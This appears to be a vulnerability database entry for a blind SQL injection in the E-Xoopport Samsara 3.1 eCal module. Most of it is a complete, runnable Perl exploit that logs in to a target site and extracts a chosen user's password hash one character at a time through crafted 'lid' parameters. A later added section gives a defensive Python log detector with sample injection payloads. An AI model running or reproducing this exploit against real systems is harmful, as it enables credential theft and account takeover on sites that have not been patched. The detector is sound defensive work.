E-Xoopport - Samsara <= 3.1 (eCal module) Remote Blind SQL Injection

2010.09.26
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew
# Web Site: www.warwolfz.org

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "
E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit

+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
\r\n";

if (@ARGV != 4) {
    print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
    exit;
}

my $host    = $ARGV[0];
my $usr     = $ARGV[1];
my $pwd     = $ARGV[2];
my $anickde = $ARGV[3];
my $anick   = '0x'.EncHex($anickde);

print "[!] Logging In...\r\n";
my %postdata = (
    uname => "$usr",
    pass  => "$pwd",
    op    => "login"
);
my $cookies = HTTP::Cookies->new(
    autosave => 1,
);
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$ua->cookie_jar($cookies);
my $req = (POST $host."/user.php", \%postdata);
my $request = $ua->request($req);
my $content = $request->content;
if ($content =~ /<h4>Benvenuto su/i) {
    print "[+] Logged in!\r\n";
} else {
    print "[-] Fatal Error: username/password incorrect?\r\n";
    exit;
}

print "[!] Checking permissions...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$req = $host."/modules/eCal/location.php?lid=1+AND+1=1";
$ua->cookie_jar($cookies);
$request = $ua->get($req);
$content = $request->content;
if ($content !~ /<b>Eventi nella localit&#224;: <\/b>/ig) {
    print "[+] Fatal Error: Access denied\r\n";
    exit;
} else {
    print "[+] You have permissions\r\n";
}

print "[!] Exploiting...\r\n";
my $i = 1;
my $pwdchr;
while ($i != 33) {
    my $wn = 47;
    while (1) {
        $wn++;
        my $ua = LWP::UserAgent->new;
        $ua->agent("Mozilla 5.0");
        my $req = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
        $ua->cookie_jar($cookies);
        my $request = $ua->get($req);
        my $content = $request->content;
        open LOGZZ, '>lol.html';
        print LOGZZ $content;
        close LOGZZ;
        if ($content !~ /<b>Eventi nella localit&#224;: <\/b><a href='localleve\.php\?lid='>/ig) {
            my $cnt = $1;
            $pwdchr .= chr($wn);
            $^O eq 'MSWin32' ? system('cls') : system('clear');
            PrintChars($anickde, $pwdchr);
            last;
        }
    }
    $i++;
}

print "\r\n[!] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.org\r\n\r\n";

sub PrintChars {
    my $anick1 = $_[0];
    my $chars  = $_[1];
    print "
E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit

+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+

[!] Logging In...
[+] Logged in!
[!] Checking permissions...
[+] You have permissions
[!] Exploiting...
[+] ".$anick1."'s md5 Password: ".$chars."
";
}

sub EncHex {
    my $char = $_[0];
    chomp $char;
    my @trans = unpack("H*", "$char");
    return $trans[0];
}

#[Unit-X] Vuln-X DB 2010.09.21
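
Added example (not part of the original advisory or exploit): a log check a defender can run to spot this attack. It flags requests to /modules/eCal/location.php whose lid is not a plain integer and counts the ascii(substring(...)) per-character guesses per client. The combined log format, the threshold of three guesses, the helper names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Matches the per-character test seen in the exploit: ascii(substring((...),<pos>,1))=<code>
PROBE_RE = re.compile(r"ascii\s*\(\s*substring\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I | re.S)

def suspicious_lid(line):
    """Return (client, decoded lid) when location.php is requested with a non-integer lid."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/modules/ecal/location.php"):
        return None
    for lid in parse_qs(url.query, keep_blank_values=True).get("lid", []):
        if not re.fullmatch(r"\d+", lid):  # a legitimate location id is digits only
            return client, lid
    return None

def analyse(log_text):
    """Per client: non-integer lid requests, per-character guesses, and positions probed."""
    report = defaultdict(lambda: {"bad_lid": 0, "guesses": 0, "positions": set()})
    for line in log_text.splitlines():
        hit = suspicious_lid(line)
        if hit:
            entry = report[hit[0]]
            entry["bad_lid"] += 1
            probe = PROBE_RE.search(hit[1])
            if probe:
                entry["guesses"] += 1
                entry["positions"].add(int(probe.group(1)))
    return dict(report)

def enumerating_clients(report, min_guesses=3):
    """Clients whose guess count suggests automated character-by-character extraction."""
    return sorted(c for c, e in report.items() if e["guesses"] >= min_guesses)

# Constructed sample log: documentation IP ranges, made-up hex-encoded user name.
PROBE_TEMPLATE = "1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=0x61646d696e+LIMIT+0,1),{},1))={}"
def sample_entry(ip, lid):
    return f'{ip} - - [26/Sep/2010:10:00:00 +0200] "GET /modules/eCal/location.php?lid={lid} HTTP/1.1" 200 4096'
SAMPLE_LOG = "\n".join(
    [sample_entry("198.51.100.7", "1+AND+1=1"), sample_entry("203.0.113.20", "3")]
    + [sample_entry("198.51.100.7", PROBE_TEMPLATE.format(p, c)) for p, c in [(1, 48), (1, 49), (2, 48)]]
)
if __name__ == "__main__":
    print("possible blind SQLi sources:", enumerating_clients(analyse(SAMPLE_LOG)))
```

Because the exploit authenticates first and reuses its session cookie, correlating the flagged client with the account that logged in through /user.php identifies which credentials were used for the extraction.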

References:

http://xforce.iss.net/xforce/xfdb/62017
http://www.exploit-db.com/exploits/15110
http://packetstormsecurity.org/1009-exploits/exoopportecal-sql.txt


Copyright 2021, cxsecurity.com

 
